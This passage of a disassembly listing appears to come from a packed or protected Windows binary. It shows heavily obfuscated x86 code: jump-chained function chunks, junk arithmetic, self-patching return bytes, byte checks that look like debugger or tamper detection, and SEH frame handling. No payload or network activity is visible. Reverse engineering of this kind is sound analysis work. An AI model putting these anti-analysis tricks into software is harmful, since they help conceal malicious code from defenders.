loc_457639:				; CODE XREF: sub_457524:loc_44C39Dj
		lea	eax, [ebp-0Ch]
		jmp	loc_4548F6
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_457641:				; CODE XREF: sub_454C24-F551j
		jo	loc_45B0E2
		popf
		jmp	loc_44D7BF
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_45764D:				; CODE XREF: sub_4415B8:loc_43EFF9j
		xchg	edi, [esp+0]
		push	3FB87B44h
		pop	esi
		rol	esi, 9

loc_457659:				; CODE XREF: sub_44723A-25A9j
		sub	esi, 2B9CC3BAh
		and	esi, ds:4000F2h
		add	esi, 0C2D06A99h
		jmp	loc_44AB6F
; END OF FUNCTION CHUNK	FOR sub_4415B8
; ---------------------------------------------------------------------------
		pushf
		jge	loc_45C22F
		jmp	sub_4521FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_45767C:				; CODE XREF: sub_449C4F-873Cj
		xchg	esi, ebp
		cmp	ecx, 56355A68h
		jmp	loc_451D00
; END OF FUNCTION CHUNK	FOR sub_449C4F

; =============== S U B	R O U T	I N E =======================================



sub_457689	proc near		; DATA XREF: sub_43C851+1540Eo

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00446A38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449ED3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045C5F0 SIZE 00000005 BYTES

		push	edx
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		push	edi

loc_457691:				; CODE XREF: sub_45024B:loc_45AA71j
		push	13B20FFEh
		jmp	loc_446A38
sub_457689	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_45769B:				; CODE XREF: sub_455C79:loc_44CE1Dj
		push	376C4F76h
		pop	esi
		and	esi, 0D6461062h
		cmp	esi, 30F5A9FEh
		jmp	loc_4406FE
; END OF FUNCTION CHUNK	FOR sub_455C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_4576B2:				; CODE XREF: sub_43F8B8-C80j
		mov	ecx, edi
		mov	edx, [edi]
		jmp	loc_43E05C
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA8F

loc_4576BB:				; CODE XREF: sub_44CA8F+Aj
		and	esi, 0D841F100h
		or	esi, 744F937Fh
		rol	esi, 1Eh
		call	sub_43D33A

loc_4576CF:				; CODE XREF: y2kk37jd:0045334Fj
		jmp	nullsub_214
; END OF FUNCTION CHUNK	FOR sub_44CA8F
; ---------------------------------------------------------------------------

loc_4576D4:				; CODE XREF: y2kk37jd:004472FAj
		jmp	loc_444350
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4410D8

loc_4576D9:				; CODE XREF: sub_4410D8:loc_443EE0j
		sub	esi, 4EF64C7Eh
		or	esi, 9D958792h
		xor	esi, 0A99D638Ah
		test	esi, 200000h
		jmp	loc_458EF6
; END OF FUNCTION CHUNK	FOR sub_4410D8

; =============== S U B	R O U T	I N E =======================================



sub_4576F6	proc near		; CODE XREF: y2kk37jd:0043DC53j
					; sub_455B08+6B11p

; FUNCTION CHUNK AT 0045691C SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, 1
		shl	eax, cl
		push	offset loc_455D16
		jmp	loc_45691C
sub_4576F6	endp

; ---------------------------------------------------------------------------
		mov	ds:off_41E0CC, eax
		lea	eax, sub_4477A2
		mov	byte ptr [eax],	0C3h
		jmp	sub_4477A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4477A2

loc_45771F:				; CODE XREF: sub_4477A2+1j
		mov	eax, [esp-4+arg_0]
		jmp	loc_455494
; END OF FUNCTION CHUNK	FOR sub_4477A2
; ---------------------------------------------------------------------------

loc_457727:				; CODE XREF: y2kk37jd:loc_458495j
					; y2kk37jd:004584A3j
		xor	esi, 1E5AAFFBh
		rol	esi, 11h
		add	esi, 11428485h
		push	offset sub_43E239
		jmp	locret_457A5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DD3

loc_457740:				; CODE XREF: y2kk37jd:0044452Dj
					; sub_457DD3:loc_457DDFj
		jnz	loc_45827B
		jmp	loc_43EAB6
; END OF FUNCTION CHUNK	FOR sub_457DD3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_45774B:				; CODE XREF: sub_442F52:loc_4487F3j
		xchg	esi, [esp+0]
		call	sub_45AAD1
		mov	eax, 0BEB860A6h
		call	sub_442C3E
		push	offset sub_447FB4
		jmp	nullsub_217
; END OF FUNCTION CHUNK	FOR sub_442F52
; ---------------------------------------------------------------------------

loc_457767:				; CODE XREF: y2kk37jd:loc_4421B2j
					; y2kk37jd:004421CBj
		rol	ebx, 0Bh
		add	ebx, 5866BB7h
		xchg	ebx, [esp]
		jmp	loc_45A763
; ---------------------------------------------------------------------------

loc_457778:				; CODE XREF: y2kk37jd:0043FFEBj
		test	ecx, eax
		jmp	loc_44F9B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_45777F:				; CODE XREF: sub_44E840:loc_4522C1j
					; y2kk37jd:0045A3EEj
		add	esi, 26735E49h
		xor	esi, 0D4A46635h
		add	esi, 0A6D0450Dh
		xchg	esi, [esp+8+var_8]
		jmp	loc_4413B4
; END OF FUNCTION CHUNK	FOR sub_44E840
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_457799:				; CODE XREF: sub_44610D-4963j
		jnz	loc_452342

loc_45779F:				; CODE XREF: sub_43E0DE+1CACDj
		jmp	loc_443621
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45120B

loc_4577A4:				; CODE XREF: sub_45120B+7j
		jmp	loc_4478B8
; END OF FUNCTION CHUNK	FOR sub_45120B
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_45233A
; ---------------------------------------------------------------------------

loc_4577AF:				; CODE XREF: y2kk37jd:loc_43D953j
		pop	edi
		rol	edi, 13h
		add	edi, 200BFD3Ch
		xor	edi, ds:4000E9h
		and	edi, 5AC684D2h
		jmp	loc_45AEFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_4577CA:				; CODE XREF: sub_451A35:loc_43BD86j
					; sub_451A35-6E4Dj
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		lea	eax, dword_457EC0
		push	eax
		push	eax
		mov	edx, eax

loc_4577DA:				; CODE XREF: sub_445226-7569j
		call	sub_4581BB
		jmp	loc_44CBAF
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B6E8

loc_4577E4:				; CODE XREF: sub_44B6E8:loc_4507E6j
					; y2kk37jd:004507FEj
		sub	ecx, 0DD6F694Ch
		add	ecx, 5644D694h
		xchg	ecx, [esp+8+var_8]
		jmp	sub_459F8F
; END OF FUNCTION CHUNK	FOR sub_44B6E8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4577F9:				; CODE XREF: y2kk37jd:00441935j
		jmp	loc_451804

; =============== S U B	R O U T	I N E =======================================



sub_4577FE	proc near		; CODE XREF: y2kk37jd:loc_43C122j
					; sub_453867:loc_43C6AEp ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C56D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043C5CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DB66 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043DCE2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E628 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EE2F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441726 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004420BA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044230B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00442D54 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004431C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E8B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446AB5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447E07 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044AEDF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044C08C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044C971 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044CA87 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044D60E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E9FF SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044F561 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453784 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453B01 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454C19 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455042 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459A94 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A6D7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B63D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C37D SIZE 00000017 BYTES

		js	loc_44E9FF
		push	218DA1BDh
		pop	eax
		or	eax, 0DFA63968h
		js	loc_442D54

loc_457816:				; CODE XREF: sub_445226+E8B5j
		jmp	loc_459A94
sub_4577FE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_45781B:				; CODE XREF: sub_44C304-CCAEj
		jmp	loc_450529
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
		jg	loc_44FAED
		jnz	loc_43E622
		jmp	loc_459F1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45913D

loc_457831:				; CODE XREF: sub_45913D:loc_45134Dj
		pop	large dword ptr	fs:0
		add	esp, 4
		or	eax, eax
		jnz	loc_4592CE
		jmp	loc_44BD00
; END OF FUNCTION CHUNK	FOR sub_45913D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_348. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_457849:				; CODE XREF: sub_440337:loc_450C44j
		jz	sub_452568
		jmp	loc_457D37
; END OF FUNCTION CHUNK	FOR sub_440337
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_228. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_457855:				; CODE XREF: sub_44C4BC-B11Bj
		jmp	loc_44D0E6
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA43

loc_45785A:				; CODE XREF: sub_43DA43+1292Cj
		jl	loc_43EE1A
		sbb	edi, 8F3D1A09h
		shl	ebx, 1Dh
		jmp	loc_43EE1A
; END OF FUNCTION CHUNK	FOR sub_43DA43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_45786E:				; CODE XREF: sub_442376+12B58j
		jnz	loc_45B2CB
		jmp	loc_442750
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------

loc_457879:				; CODE XREF: y2kk37jd:00443350j
		jnz	loc_4428E2
; START	OF FUNCTION CHUNK FOR sub_445C40

loc_45787F:				; CODE XREF: sub_445C40+10445j
		jmp	nullsub_220
; END OF FUNCTION CHUNK	FOR sub_445C40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_457884:				; CODE XREF: sub_44A298:loc_448F50j
		jmp	loc_447CD0
; END OF FUNCTION CHUNK	FOR sub_44A298
; ---------------------------------------------------------------------------
		ror	ebx, 15h
		jmp	loc_45BFD2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_457891:				; CODE XREF: sub_44F641:loc_45AC81j
		test	ebp, ecx
		jmp	loc_4561FF
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44625E

loc_457898:				; CODE XREF: sub_44625E+Aj
		pop	eax
		rol	eax, 6
		push	offset sub_44896B
		jmp	nullsub_221
; END OF FUNCTION CHUNK	FOR sub_44625E

; =============== S U B	R O U T	I N E =======================================



sub_4578A6	proc near		; CODE XREF: sub_4415B8-25C4p
					; sub_445226-4E48j

; FUNCTION CHUNK AT 0043C2EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DDAF SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0044266E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00448F56 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B051 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B29A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F0D1 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450908 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450F6A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00453EAF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004555A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455A1C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045671A SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		jmp	loc_453EAF
sub_4578A6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CCE7

loc_4578B5:				; CODE XREF: sub_44CCE7+E239j
		jl	loc_440D39
		add	edi, 0A57F1BE8h
		mov	ebx, [edx]
		mov	esi, 0E0FDDDCFh
		sbb	ebx, 7F622EDh
		jmp	loc_440D37
; END OF FUNCTION CHUNK	FOR sub_44CCE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4578D3:				; CODE XREF: sub_4411C3+55BBj
		popf
		jmp	loc_450BD6
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDE6

loc_4578D9:				; CODE XREF: sub_43FDE6+1C8EDj
		push	edx
		call	sub_45ADEC
		push	0ABCEB4F8h
		pop	eax
		or	eax, 0ADB10B5Fh
		test	eax, 20000h
		jmp	loc_459FAA
; END OF FUNCTION CHUNK	FOR sub_43FDE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444825

loc_4578F6:				; CODE XREF: sub_444825+432Bj
		jbe	loc_450E9F
		sub	ebx, eax
		jmp	loc_448B06
; END OF FUNCTION CHUNK	FOR sub_444825
; ---------------------------------------------------------------------------

loc_457903:				; CODE XREF: y2kk37jd:loc_44F920j
		jge	loc_453A8D
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_457909:				; CODE XREF: sub_44DC38-50CFj
		jmp	loc_4573E2
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------
		mov	ecx, [eax]

loc_457910:				; CODE XREF: y2kk37jd:loc_43D740j
		jmp	loc_453A8C
; ---------------------------------------------------------------------------

loc_457915:				; DATA XREF: sub_445226+10246o
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	edx
		push	0DA7E9201h
		jmp	loc_45208A
; ---------------------------------------------------------------------------

loc_457926:				; CODE XREF: y2kk37jd:0045692Cj
		sub	edx, 0A918852Fh
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_45792C:				; CODE XREF: sub_44CF38+99DEj
		and	eax, 130FA25Fh
		cmp	eax, 4855B3C7h
		jmp	loc_451A0C
; END OF FUNCTION CHUNK	FOR sub_44CF38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_45793D:				; CODE XREF: sub_44EE3D-12E5Ej
		jz	loc_45B71C
		jmp	loc_43DE60
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------

loc_457948:				; CODE XREF: y2kk37jd:004597DAj
		test	esi, 40h
		jmp	loc_4555AD
; ---------------------------------------------------------------------------

loc_457953:				; CODE XREF: y2kk37jd:0043C099j
		js	loc_447693
; START	OF FUNCTION CHUNK FOR sub_443EAB

loc_457959:				; CODE XREF: sub_443EAB+2EADj
		jmp	loc_440005
; END OF FUNCTION CHUNK	FOR sub_443EAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45070F

loc_45795E:				; CODE XREF: sub_45070F-14109j
		jmp	loc_43FF76
; END OF FUNCTION CHUNK	FOR sub_45070F
; ---------------------------------------------------------------------------
		jns	loc_43E72E
		and	edi, edx
		mov	esi, [ecx]
		sub	ebp, esi
		jmp	loc_444FEC
; ---------------------------------------------------------------------------

loc_457974:				; CODE XREF: y2kk37jd:loc_447488j
		not	ebp
		jmp	loc_453FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DED9

loc_45797B:				; CODE XREF: sub_44DED9:loc_4522ADj
					; sub_44DED9+C55Ej
		call	sub_457986
		retn
; END OF FUNCTION CHUNK	FOR sub_44DED9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45922C

loc_457981:				; CODE XREF: sub_45922C+Aj
		jmp	loc_45A999
; END OF FUNCTION CHUNK	FOR sub_45922C

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_457986	proc near		; CODE XREF: sub_44DED9:loc_45797Bp

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043EB0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004584D5 SIZE 00000024 BYTES

		push	ebp
		mov	ebp, esp

loc_457989:				; CODE XREF: y2kk37jd:loc_43CAECj
					; sub_451634-E8B7j
		add	esp, 0FFFFFFF8h
		push	edi
		push	1BD2EC72h
		jmp	loc_43EB0D
sub_457986	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A48B

loc_457997:				; CODE XREF: sub_44A48B:loc_447C64j
		or	eax, 0C0E11BE1h
		add	eax, 81AC031h
		call	sub_44113A
		mov	ds:off_41E020, eax
		lea	eax, sub_452441
		mov	byte ptr [eax],	0C3h

loc_4579B7:				; CODE XREF: sub_43C46D:loc_43E50Ej
		jmp	sub_452441
; END OF FUNCTION CHUNK	FOR sub_44A48B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452441

loc_4579BC:				; CODE XREF: sub_452441+6j
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_440111
; END OF FUNCTION CHUNK	FOR sub_452441
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447407

loc_4579C5:				; CODE XREF: sub_447407+133E1j
		cdq

loc_4579C6:				; CODE XREF: sub_447407:loc_453594j
		mov	eax, [esp+0]
		push	eax
		push	eax
		push	0EA1326A0h
		pop	eax
		xor	eax, 98FA6D53h
		jmp	loc_450BB8
; END OF FUNCTION CHUNK	FOR sub_447407
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4579DC:				; CODE XREF: sub_4411C3+12091j
		js	loc_45C6C8

loc_4579E2:				; CODE XREF: sub_4411C3:loc_447002j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4422CD
		jmp	loc_44750B
; END OF FUNCTION CHUNK	FOR sub_4411C3

; =============== S U B	R O U T	I N E =======================================



sub_4579F3	proc near		; DATA XREF: sub_44365E+Co
		mov	byte ptr [eax],	0C3h
		jmp	sub_4587AA
sub_4579F3	endp

; ---------------------------------------------------------------------------
		call	nullsub_23
		jmp	ds:dword_41E058
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45405E

loc_457A06:				; CODE XREF: sub_45405E-18E06j
		jmp	sub_44572F
; END OF FUNCTION CHUNK	FOR sub_45405E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_457A0C:				; CODE XREF: sub_45B7AA:loc_44BD55j
		jno	loc_44BA24
		mov	eax, [esp+0]
		push	edx
		jmp	loc_445DC5
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_457A1B:				; CODE XREF: sub_4440AB:loc_44AE57j
		push	eax
		call	dword ptr [ebp-4]
		test	eax, eax
		jz	loc_43B9A3
		jmp	loc_447265
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------
		mov	eax, 0EA3AEDBCh
		call	sub_44113A
		push	offset loc_447B43
		jmp	loc_45703F
; ---------------------------------------------------------------------------

loc_457A40:				; CODE XREF: y2kk37jd:0045A0BAj
		or	ebx, 6FCDA09h

; =============== S U B	R O U T	I N E =======================================



sub_457A46	proc near		; CODE XREF: sub_454C24-D376p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DCEF SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F10A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043F201 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440773 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441523 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441667 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443069 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444E5E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445F2B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00448A43 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 00449088 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004496A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DF73 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452D4D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004548BE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455294 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D81 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459CB0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A715 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C083 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		pop	edi
		mov	[ebx], eax
		pop	ebx

loc_457A4E:				; CODE XREF: sub_457A46-EFDCj
					; sub_457A46-E9A8j
		jns	loc_448A54
		mov	eax, ds:dword_4516B8
		jmp	loc_45C083
sub_457A46	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_457A5E:				; CODE XREF: y2kk37jd:0045773Bj
		retn
; ---------------------------------------------------------------------------

loc_457A5F:				; CODE XREF: y2kk37jd:0044747Cj
		jmp	loc_44504F
; ---------------------------------------------------------------------------
		shr	edx, 14h
		jmp	sub_453FAB
; ---------------------------------------------------------------------------

locret_457A6C:				; CODE XREF: y2kk37jd:0044C2A9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D61E

loc_457A6D:				; CODE XREF: sub_43D61E+Bj
		jmp	loc_43CEE3
; END OF FUNCTION CHUNK	FOR sub_43D61E
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	eax
		mov	eax, edx
		xchg	eax, [esp]
		call	sub_446819
		jmp	loc_44A378
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_214. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_457A87	proc near		; DATA XREF: sub_440A37+6o

; FUNCTION CHUNK AT 0045A0BF SIZE 00000016 BYTES

		shl	al, cl
		push	821A3A35h
		pop	edx
		rol	edx, 10h
		sub	edx, ds:4000EDh
		jmp	loc_45A0BF
sub_457A87	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_499. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B37E

loc_457A9E:				; CODE XREF: sub_43B37E+171C2j
					; y2kk37jd:0045708Ej
		jmp	loc_43F403
; END OF FUNCTION CHUNK	FOR sub_43B37E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_457AA3:				; CODE XREF: sub_445226+107j
		jmp	loc_44EFBA
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_457AA8	proc near		; DATA XREF: sub_451C7D+1B9o

; FUNCTION CHUNK AT 00443C05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453EBE SIZE 0000000B BYTES

		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44170B
		jmp	loc_443C05
sub_457AA8	endp

; ---------------------------------------------------------------------------
		pushf
		jmp	sub_43B67C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_458. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_457AC1:				; CODE XREF: sub_44610D-2DD8j
		jmp	loc_442150
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_457AC6:				; CODE XREF: y2kk37jd:loc_440D7Bj
					; sub_443AA7:loc_443F2Aj ...
		jz	loc_45A34E
		jmp	loc_4409BF
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D1

loc_457AD1:				; CODE XREF: sub_4450D1:loc_444CFCj
		push	6CC5C74Eh
		pop	ecx
		sub	ecx, 165B6277h
		add	ecx, 0A9D77B69h

loc_457AE3:				; CODE XREF: y2kk37jd:loc_43C32Fj
		jmp	loc_4477D8
; END OF FUNCTION CHUNK	FOR sub_4450D1

; =============== S U B	R O U T	I N E =======================================



sub_457AE8	proc near		; DATA XREF: sub_4448E2+8213o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00459AF0 SIZE 00000005 BYTES

		push	edi
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		mov	eax, edx
		call	sub_44461D
		push	offset loc_43DAB2

loc_457AFA:				; CODE XREF: y2kk37jd:loc_44275Dj
		jmp	loc_459AF0
sub_457AE8	endp

; ---------------------------------------------------------------------------
		mov	ds:off_41E1F0, eax
		push	offset sub_44D0AD
		jmp	locret_441781
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445D0C

loc_457B0F:				; CODE XREF: sub_445D0C+1Aj
		push	esi
		push	offset sub_45454E
		jmp	loc_45BEFF
; END OF FUNCTION CHUNK	FOR sub_445D0C
; ---------------------------------------------------------------------------
		test	eax, eax
		call	sub_44CB7B
		jmp	ds:off_41E064
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_457B27:				; CODE XREF: sub_4401D6:loc_4401EEj
					; sub_4504DD-E6A7j ...
		jnz	loc_43F9A4
		xchg	ebx, [esp-8+arg_4]
		mov	edx, ebx
		jmp	loc_4427B6
; END OF FUNCTION CHUNK	FOR sub_4504DD
; ---------------------------------------------------------------------------
		jl	loc_43F457
		sbb	edx, 5530121Dh
		jmp	sub_443B86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_457B48:				; CODE XREF: sub_443BAF+154Fj
		jge	loc_45800F
		xor	ecx, eax
		jmp	loc_458002
; END OF FUNCTION CHUNK	FOR sub_443BAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_457B55:				; CODE XREF: sub_45689F:loc_43C2BAj
		cmp	byte ptr [eax],	0F1h
		jnz	loc_441710
		jmp	loc_457B7A
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_457B63:				; CODE XREF: y2kk37jd:loc_45C5B6j
		pop	edx
		xchg	edx, [esp]
		mov	eax, [ebp-4]
		push	eax
		call	sub_459800
		push	offset loc_44947D
		jmp	loc_43B39A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_457B7A:				; CODE XREF: sub_45689F+12BFj
		jz	loc_44170B
		jmp	loc_450C7E
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
		jge	loc_43E31B
		jmp	loc_442043

; =============== S U B	R O U T	I N E =======================================



sub_457B90	proc near		; CODE XREF: y2kk37jd:004451E8p
					; y2kk37jd:00458E72j

; FUNCTION CHUNK AT 0043D88E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004470EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AF0B SIZE 00000009 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, 5244E9h
		mov	eax, [eax]
		or	eax, eax
